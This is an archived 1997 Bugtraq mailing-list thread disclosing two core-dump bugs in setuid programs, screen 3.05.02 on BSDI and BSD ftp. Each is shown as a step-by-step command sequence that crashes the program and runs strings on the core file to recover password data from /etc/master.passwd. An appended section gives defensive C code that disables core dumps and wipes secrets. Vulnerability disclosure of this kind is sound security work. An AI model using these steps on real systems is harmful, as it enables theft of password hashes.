[4048] in bugtraq


Re: screen 3.05.02

daemon@ATHENA.MIT.EDU (owner-bugtraq@NETSPACE.ORG)
Sun Feb 16 15:29:14 1997

From: <owner-bugtraq@NETSPACE.ORG>
Date: 	Sat, 15 Feb 1997 21:18:56 -0800
To: BUGTRAQ@NETSPACE.ORG

This exploit is very similar to the FTP exploit on BSD that creates an
ftp.core file you can then run strings on and get the encrypted password file.

#ftp foobar.com
Welcom to foobar.com ftp site
blah blah blah
please enter login name> evil
that user requires a password> evil2
 User evil loged in welcome to foobar.com!
Remote set to type BIN
200>

(now hit ^Z to suspend the process)

#ps
  PID  TT  STAT      TIME COMMAND
 9526  p0  Ss     0:00.12 -csh (csh)
 9539  p0  R+     0:00.02 ps
1000   p0  Ss     0:00.22 ftp

(get the PID number to the ftp process)

#kill -11 1000

(kill the process)

#fg

(bring the ftp back to the foreground)

Process Killed Core Dump (blah blah)
#ls
home          mail         public_html        ftp.core
#strings ftp.core  > test
#pico test


I know this is an older hole, but what the hell, it still works on BSD!


Bronc Buster
bbuster@succeed.net
www2.succeed.net/~bbuster


>The program under question is /usr/contrib/bin/screen (BSDI).  This is
>screen version 3.05.02 and is installed setuid root, as it is "supposed"
>to be.  Here is a demonstration:
>
>$ screen
>
>Screen version 3.05.02 (FAU) 19-Aug-93
>
>Copyright (c) 1993 Juergen Weigert, Michael Schroeder
>Copyright (c) 1987 Oliver Laumann
>
>This program is free software; you can redistribute it and/or modify it under
>the terms of the GNU General Public License as published by the Free Software
>Foundation; either version 2, or (at your option) any later version.
>
>This program is distributed in the hope that it will be useful, but WITHOUT
>ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
>FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
>
>You should have received a copy of the GNU General Public License along with
>this program (see the file COPYING); if not, write to the Free Software
>Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
>
>Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to
>screen@uni-erlangen.de (bah.. send them to Bugtraq!)
>
>                        [Press Space or Return to end.]
>
>$ screen
>
>$ cd /tmp/screens/S-khelbin
>$ ls
>246.ttyp7.comet
>$ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
>> anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
>> anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
>$ screen -ls
>/tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous:
>connect: Invalid argument
>%1     278 Abort - core dumped  screen -ls
>$ ls -l
>total 176
>srwx------  1 khelbin  khelbin       0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
>-rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
>$ strings core.screen|less
>
>
>The core.screen file contains unencrypted password strings from
>/etc/master.passwd, which of course, should not be readable by me.  I'm
>also sure there's a buffer-overflow here but I haven't had as much time as
>I would like to look through the source yet.
>
>
> -khelbin / 9x
> email: khelbin@connix.com
>
>
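Both posts above describe the same failure mode: a program that has privileged data in memory crashes (here on malformed input) and leaves that data in a core file its unprivileged user can read. The pattern a setuid program should follow instead, as an added example that is not code from either post or from screen itself; all function names are hypothetical and the sample record in the test is constructed:

```c
/* Added example, not code from either post. Defensive pattern for a setuid
 * program holding privileged data (the quoted case: screen reading
 * /etc/master.passwd): forbid core files before the secret is in memory and
 * scrub it once used, so abort() on bad input cannot leak it via a core. */
#include <string.h>
#include <sys/resource.h>

/* Core-file size limit 0 for this process and its children. Lowering a
 * limit needs no privilege, so this also works after dropping root. */
int disable_core_dumps(void) {
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Current soft core-file limit, -1 if the query fails; lets a caller
 * verify the hardening actually took effect. */
long current_core_limit(void) {
    struct rlimit rl;
    return getrlimit(RLIMIT_CORE, &rl) == 0 ? (long)rl.rlim_cur : -1;
}

/* Zero a buffer through a volatile pointer so the compiler cannot
 * discard the stores as dead writes. */
void wipe(void *p, size_t n) {
    volatile unsigned char *q = p;
    while (n--)
        *q++ = 0;
}

/* Constant-time equality of n bytes (timing does not depend on contents). */
static int ct_equal(const char *a, const char *b, size_t n) {
    unsigned char d = 0;
    for (size_t i = 0; i < n; i++)
        d |= (unsigned char)(a[i] ^ b[i]);
    return d == 0;
}

/* Copy the privileged record (stand-in for a password-database line) into a
 * local buffer, compare, and scrub on every path. 1 = match, else 0. */
int check_against_secret(const char *stored, const char *candidate) {
    char buf[128];
    size_t n = strlen(stored);
    int match = 0;
    if (n < sizeof buf && disable_core_dumps() == 0) { /* no secret in RAM otherwise */
        memcpy(buf, stored, n + 1);
        match = strlen(candidate) == n && ct_equal(buf, candidate, n);
    }
    wipe(buf, sizeof buf);
    return match;
}
```

On modern kernels setuid processes are already non-dumpable by default, but the explicit limit still protects the case the posts show, where the program keeps running as the invoking user after privileges are dropped.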
